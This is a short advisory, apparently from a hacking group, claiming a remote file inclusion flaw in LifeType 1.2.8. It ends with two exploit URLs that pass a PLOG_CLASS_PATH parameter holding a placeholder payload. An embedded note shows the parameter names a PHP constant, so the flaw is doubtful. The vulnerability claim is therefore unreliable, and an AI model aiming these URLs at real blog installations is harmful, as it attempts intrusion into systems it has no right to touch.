/===============================================================================================================================================\
|
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
|
| Software : LifeType 1.2.8
| Vendor : http://lifetype.net/
| Author : Cru3l.b0y
| Contact : [email protected]
| Home : WwW.DeltaHacking.Net
|===============================================================================================================================================|
|
| [o] Vulnerable files
|
| install/installation.class.php
|
| include_once( PLOG_CLASS_PATH."config/config.properties.php" );
|
|
| class/bootstrap.php
|
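| include( PLOG_CLASS_PATH."class/object/loader.class.php" );
|
| Note: in both snippets PLOG_CLASS_PATH is written as a bare identifier, i.e. a PHP constant, not a $variable.
| Request parameters (even with register_globals enabled) populate variables, never constants, so the include
| path is attacker-controlled only if the application derives the constant from request data. Nothing quoted
| here shows that; confirm it against the LifeType source before treating this as remote file inclusion.
| Independently of that, neither file is meant to be requested directly: define the constant before any
| include, and deny web access to install/ and class/ once installation is complete.
|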
|
| [o] Exploit
|
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
|
|===============================================================================================================================================|